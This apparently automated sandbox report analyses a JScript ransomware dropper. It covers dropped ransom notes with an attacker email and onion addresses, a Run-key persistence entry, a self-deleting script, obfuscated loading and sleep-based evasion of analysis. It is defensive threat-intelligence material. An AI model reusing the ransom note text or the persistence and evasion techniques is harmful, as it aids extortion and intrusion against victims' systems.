Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README3.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README4.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README5.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README6.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README7.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README8.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README9.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README10.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file

System Summary:

Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00417871: CreateFileW,DeviceIoControl,CloseHandle
Creates mutexes
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:964:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_01
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_004182F7
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00412CBF
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00416D6D
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00478E5B
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00413375
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00409519
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00407B25
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00405D99
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_0044BEFB
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00417EB5
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_005700E0
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_0046216A
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00578217
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_005702E0
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_0047C295
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00562481
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_0056455E
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00458591
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00578600
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00412699
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00572886
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00424930
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_0055CA56
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00578BC0
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00448BF0
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_0040AC3A
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_0055AD61
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00574D00
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00578D00
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00414D81
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00572EF9
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00578E80
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00562F09
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00521171
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00573180
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_004411B7
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_0041D211
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00571230
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00575290
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: String function: 005501C8 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: String function: 004427B6 appears 79 times
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: String function: 0040383F appears 59 times
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: String function: 005188C9 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: String function: 0056F5DC appears 152 times
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: String function: 0055E5C0 appears 151 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: 21#U043e #U0437#U0430#U043a#U0430#U0437#U0435.js | Initial sample: Strings found which are bigger than 50
Reads the hosts file
Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File read: C:\Windows\System32\drivers\etc\hosts
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wow64log.dll
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Section loaded: wow64log.dll
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Section loaded: cscapi.dll
Source: C:\ProgramData\Windows\csrss.exe | Section loaded: wow64log.dll
Source: C:\ProgramData\Windows\csrss.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\chcp.com | Section loaded: wow64log.dll
Classification label
Source: classification engine | Classification label: mal100.rans.troj.evad.winJS@16/229@12/11
Contains functionality to enum processes or threads
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId
Creates files inside the user directory
Source: C:\Windows\SysWOW64\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DBB5U303\messg[1].jpg
Creates temporary files
Source: C:\Windows\SysWOW64\wscript.exe | File created: C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmp
Reads ini files
Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Windows\SysWOW64\wscript.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\21#U043e #U0437#U0430#U043a#U0430#U0437#U0435.js'
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmp
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmp
Source: unknown | Process created: C:\ProgramData\Windows\csrss.exe 'C:\ProgramData\Windows\csrss.exe'
Source: unknown | Process created: C:\ProgramData\Windows\csrss.exe 'C:\ProgramData\Windows\csrss.exe'
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe List Shadows
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Windows\SysWOW64\chcp.com chcp
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmp
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmp
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe List Shadows
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp
Uses an in-process (OLE) Automation server
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected

Data Obfuscation:

JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\SysWOW64\wscript.exe | Anti Malware Scan Interface: .Run("cmd.exe /c C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmp", "0");StringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStrin
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_0041A13C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetP
PE file contains an invalid checksum
Source: rad8AE2B.tmp.1.dr | Static PE information: real checksum: 0x185938 should be: 0x17b94a
Source: messg[1].jpg.1.dr | Static PE information: real checksum: 0x185938 should be: 0x17b94a
Source: csrss.exe.6.dr | Static PE information: real checksum: 0x185938 should be: 0x17b94a
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 1_2_052FAFCF push es; retf 1_2_052FB25D
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_0055020D push ecx; ret 6_2_00550220
Source: C:\ProgramData\Windows\csrss.exe | Code function: 7_2_028D40E0 push edx; ret 7_2_028D41F1
Source: C:\ProgramData\Windows\csrss.exe | Code function: 7_2_028D4080 push edx; ret 7_2_028D408B
Source: C:\ProgramData\Windows\csrss.exe | Code function: 10_2_028D40E0 push edx; ret 10_2_028D41F1
Source: C:\ProgramData\Windows\csrss.exe | Code function: 10_2_028D4080 push edx; ret 10_2_028D408B
Source: C:\ProgramData\Windows\csrss.exe | Code function: 10_1_00566120 push edx; ret 10_1_0056647D
Source: C:\ProgramData\Windows\csrss.exe | Code function: 10_1_00417D4A push ebx; ret 10_1_00417D4B
Source: C:\ProgramData\Windows\csrss.exe | Code function: 10_1_00416108 push ebp; retf 10_1_00416109
Source: C:\ProgramData\Windows\csrss.exe | Code function: 10_1_004149CC pushad ; retf 10_1_004149CD

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File created: C:\ProgramData\Windows\csrss.exe
Source: C:\Windows\SysWOW64\wscript.exe | File created: C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmp
Source: C:\Windows\SysWOW64\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DBB5U303\messg[1].jpg
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File created: C:\ProgramData\Windows\csrss.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\SysWOW64\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DBB5U303\messg[1].jpg
Creates license or readme file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File created: C:\README1.txt
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File created: C:\README2.txt
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File created: C:\README3.txt
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File created: C:\README4.txt
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File created: C:\README5.txt
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File created: C:\README6.txt
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File created: C:\README7.txt
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File created: C:\README8.txt
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File created: C:\README9.txt
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | File created: C:\README10.txt

Boot Survival:

Creates an autostart registry key
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime Subsystem
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime Subsystem

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Windows\SysWOW64\wscript.exe | File deleted: c:\users\user\desktop\21#u043e #u0437#u0430#u043a#u0430#u0437#u0435.js
May use the Tor software to hide its network traffic
Source: rad8AE2B.tmp, csrss.exe, 00000007.00000002.8957279020.0000000000400000.00000040.sdmp, csrss.exe, 0000000A.00000002.9032107262.0000000000400000.00000040.sdmp | Binary or memory string: onion-port
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Code function: 6_2_0041A13C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetP
Disables application error messages (SetErrorMode)
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Windows\csrss.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Windows\csrss.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Windows\csrss.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Windows\csrss.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Windows\csrss.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Windows\csrss.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Windows\csrss.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Windows\csrss.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Code function: 6_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,6_2_00449089
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_6-47124
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716 Thread sleep time: -47434s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716 Thread sleep time: -52378s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716 Thread sleep time: -32500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716 Thread sleep time: -31401s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 3488 Thread sleep time: -35425s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716 Thread sleep time: -33732s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716 Thread sleep time: -50975s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716 Thread sleep time: -54757s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716 Thread sleep time: -46645s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716 Thread sleep time: -44960s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 3488 Thread sleep time: -34101s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 3488 Thread sleep time: -35492s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716 Thread sleep time: -32114s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716 Thread sleep time: -35895s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716 Thread sleep time: -55954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716 Thread sleep time: -58791s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 3488 Thread sleep time: -30635s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
